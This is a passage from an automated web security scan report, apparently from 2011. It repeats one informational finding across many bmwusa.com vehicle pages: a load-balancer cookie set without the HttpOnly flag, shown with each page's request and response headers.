Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:49:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:09:23 GMT;path=/
Content-Length: 202376

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.197. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:18 GMT;path=/
Content-Length: 215003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.198. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:10:44 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:50:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:10:44 GMT;path=/
Content-Length: 201885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.199. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:27 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:48:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:08:27 GMT;path=/
Content-Length: 216441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.200. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:36 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/3seriessportswagonmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:36 GMT;path=/
Content-Length: 202621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.201. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:13 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:13 GMT;path=/
Content-Length: 215034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.202. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:58:11 GMT;path=/
Content-Length: 226530

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.203. http://www.bmwusa.com/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:29 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/328ixdrivesportswagon/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:56:29 GMT;path=/
Content-Length: 217613

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.204. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:35 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:18:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:38:35 GMT;path=/
Content-Length: 202177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.205. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:36:14 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/3seriessedanmediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:16:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:36:14 GMT;path=/
Content-Length: 202178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.206. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:19 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:19 GMT;path=/
Content-Length: 214393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.207. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:37:18 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:17:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:37:18 GMT;path=/
Content-Length: 225963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.208. http://www.bmwusa.com/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:59 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335dsedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:15:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:35:59 GMT;path=/
Content-Length: 214580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.209. http://www.bmwusa.com/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:51:11 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/3/335iconvertible/3seriesconvertiblemediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
